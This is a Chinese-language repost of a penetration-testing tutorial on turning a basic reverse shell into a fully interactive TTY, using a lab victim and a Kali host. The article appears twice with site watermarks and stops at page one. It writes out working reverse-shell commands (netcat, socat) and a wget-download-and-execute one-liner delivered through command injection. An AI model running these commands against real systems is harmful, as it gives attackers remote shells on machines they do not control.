欢迎来到 无奈人生 安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

如何将简单的Shell转换成为完全交互式的TTY

来源: 作者: 时间:2019-02-24 21:00 点击: 我要投稿
广告位API接口通信错误,查看德得广告获取帮助

作为一名渗透测试人员,最令人激动的莫过于netcat为我们反弹回了一个shell连接,以及通过id命令查看到一个令人满意的用户权限。但凡事总有意外,由于我们获取的shell并不是一个具有完整交互的shell,因此可能会在使用过程中被挂起,甚至还可能会因为我们的操作失误,例如不小心摁下了 “Ctrl-C”键,这将直接终止我们的整个shell进程让徒劳而归。

除了没有正确处理SIGINT(信号)之外,这些“哑”shell还有其它诸多缺点:
一些命令如su和ssh,需要一个正确的终端才能运行
通常不显示STDERR
无法正常使用vim等文本编辑器
没有完成标签
没有向上箭头使用历史
没有jobcontrol等
长话短说虽然这些sehll也很棒,但我更倾向于在完全互动的TTY中进行操作。下面我将为大家分享一些用来“升级”这些shell的技巧和方法。在正式开始之前我向大家推荐一个叫Pentest Monkey的博客,以及Phineas Fisher的技术视频和writeup:
http://pentestmonkey.net/blog/post-exploitation-without-a-tty
https://www.youtube.com/watch?v=oI_ZhFCS3AQ#t=25m53s
http://pastebin.com/raw/0SNSvyjJ
为了便于演示,以下所有的屏幕截图和命令都将在一台易受攻击的Web服务器(“VICTIM”)和用于捕获shell的Kali VM(“KALI”)上完成。
VICTIM IP: 10.0.3.7
KALI IP: 10.0.3.4
生成反向shell命令
我们首先使用netcat来获取最常见的反向shell:
nc -e /bin/sh 10.0.3.4 4444
在kali虚拟机上我们输入以下命令:
nc -lvp 4444
问题不在于每个服务器是否都安装了netcat,并且也不是每个版本的netcat都具备-e选项。Pentest Monkey有篇关于反向shell的cheatsheet,为我们提供了一些不同的方法。但我更热衷于使用Metasploit的msfvenom一行生成命令。
Metasploit在“cmd/unix”下,有几个可用于生成单行绑定或反向shell的payload:

以上显示的所有payload都可以和msfvenom一起使用,并且我们可以根据自身需求指定LHOST,LPORT或RPORT。例如,这里是一个不需要-e标志的netcat命令:

如果没有安装netcat,我们还可以生成一个Perl的反向shell:

这些都可以通过使用netcat,并侦听指定的端口(4444)来捕获。
方法1:Python pty模块
对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
在创建完成后,我们此时就可以运行su命令了。(并且界面提示也变得更加友好)

即便如此,但问题依旧没有完全的解决。例如SIGINT(Ctrl-C)仍然会关闭终止Netcat,完成标签或历史记录也依旧没有,但这个方法在实际运用中也有一定的效果。
方法2:使用socat
socat是一个netcat上的替代工具,可以说是nc的增强版。我们可以使用Socat通过TCP连接传递完整的TTY。
如果你成功在目标机器安装了socat,那么我们就可以通过以下命令来获取到一个完全交互式的TTY反向shell:
在kali虚拟机我们运行以下侦听命令:
socat file:`tty`,raw,echo=0 tcp-listen:4444 
在目标机器我们运行:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
如果目标系统没有安装socat你可以通过以下Github地址,下载相关的二进制静态文件进行安装:
https://github.com/andrew-d/static-binaries
通过命令注入漏洞,我们可以将socat二进制文件下载到一个可写的目录,并通过chmod命令修改文件的执行权限,然后在一行中执行反向shell:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 
此时在kali,你将会获取到一个完全交互式的TTY会话。它支持完成标签,SIGINT/SIGSTP,vim,向上箭头使用历史等。

方法3:魔术般的Netcat升级
在Phineas Fisher的技术视频中该方法被展示出来,在我看来感觉就像是魔术一般。基本操作就是在kali终端内设置一些stty选项,最终将“哑”netcat shell升级到了一个完全交互的TTY。
首先我们使用与方法1相同的技术来生成PTY。一旦bash在PTY中运行,我们按Ctrl-Z键将shell调至后台运行

[1] [2]  下一页

作为一名渗透测试人员,最令人激动的莫过于netcat为我们反弹回了一个shell连接,以及通过id命令查看到一个令人满意的用户权限。但凡事总有意外,由于我们获取的shell并不是一个具有完整交互的shell,因此可能会在使用过程中被挂起,甚至还可能会因为我们的操作失误,例如不小心摁下了 “Ctrl-C”键,这将直接终止我们的整个shell进程让徒劳而归。

除了没有正确处理SIGINT(信号)之外,这些“哑”shell还有其它诸多缺点:
一些命令如su和ssh,需要一个正确的终端才能运行
通常不显示STDERR
无法正常使用vim等文本编辑器
没有完成标签
没有向上箭头使用历史
没有jobcontrol等
长话短说虽然这些sehll也很棒,但我更倾向于在完全互动的TTY中进行操作。下面我将为大家分享一些用来“升级”这些shell的技巧和方法。在正式开始之前我向大家推荐一个叫Pentest Monkey的博客,以及Phineas Fisher的技术视频和writeup:

本文来自无奈人生安全网


http://pentestmonkey.net/blog/post-exploitation-without-a-tty
https://www.youtube.com/watch?v=oI_ZhFCS3AQ#t=25m53s
http://pastebin.com/raw/0SNSvyjJ
为了便于演示,以下所有的屏幕截图和命令都将在一台易受攻击的Web服务器(“VICTIM”)和用于捕获shell的Kali VM(“KALI”)上完成。
VICTIM IP: 10.0.3.7
KALI IP: 10.0.3.4
生成反向shell命令
我们首先使用netcat来获取最常见的反向shell:
nc -e /bin/sh 10.0.3.4 4444
在kali虚拟机上我们输入以下命令:
nc -lvp 4444
问题不在于每个服务器是否都安装了netcat,并且也不是每个版本的netcat都具备-e选项。Pentest Monkey有篇关于反向shell的cheatsheet,为我们提供了一些不同的方法。但我更热衷于使用Metasploit的msfvenom一行生成命令。
Metasploit在“cmd/unix”下,有几个可用于生成单行绑定或反向shell的payload:

copyright 无奈人生


以上显示的所有payload都可以和msfvenom一起使用,并且我们可以根据自身需求指定LHOST,LPORT或RPORT。例如,这里是一个不需要-e标志的netcat命令:

如果没有安装netcat,我们还可以生成一个Perl的反向shell:

这些都可以通过使用netcat,并侦听指定的端口(4444)来捕获。
方法1:Python pty模块
对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
在创建完成后,我们此时就可以运行su命令了。(并且界面提示也变得更加友好)

无奈人生安全网


即便如此,但问题依旧没有完全的解决。例如SIGINT(Ctrl-C)仍然会关闭终止Netcat,完成标签或历史记录也依旧没有,但这个方法在实际运用中也有一定的效果。
方法2:使用socat
socat是一个netcat上的替代工具,可以说是nc的增强版。我们可以使用Socat通过TCP连接传递完整的TTY。
如果你成功在目标机器安装了socat,那么我们就可以通过以下命令来获取到一个完全交互式的TTY反向shell:
在kali虚拟机我们运行以下侦听命令:
socat file:`tty`,raw,echo=0 tcp-listen:4444 
在目标机器我们运行:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
如果目标系统没有安装socat你可以通过以下Github地址,下载相关的二进制静态文件进行安装:
https://github.com/andrew-d/static-binaries
通过命令注入漏洞,我们可以将socat二进制文件下载到一个可写的目录,并通过chmod命令修改文件的执行权限,然后在一行中执行反向shell:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 
内容来自无奈安全网

此时在kali,你将会获取到一个完全交互式的TTY会话。它支持完成标签,SIGINT/SIGSTP,vim,向上箭头使用历史等。

方法3:魔术般的Netcat升级
在Phineas Fisher的技术视频中该方法被展示出来,在我看来感觉就像是魔术一般。基本操作就是在kali终端内设置一些stty选项,最终将“哑”netcat shell升级到了一个完全交互的TTY。
首先我们使用与方法1相同的技术来生成PTY。一旦bash在PTY中运行,我们按Ctrl-Z键将shell调至后台运行

内容来自无奈安全网

[1] [2]  下一页 无奈人生安全网

。 (责任编辑:admin)
【声明】:无奈人生安全网(http://www.wnhack.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱472701013@qq.com,我们会在最短的时间内进行处理。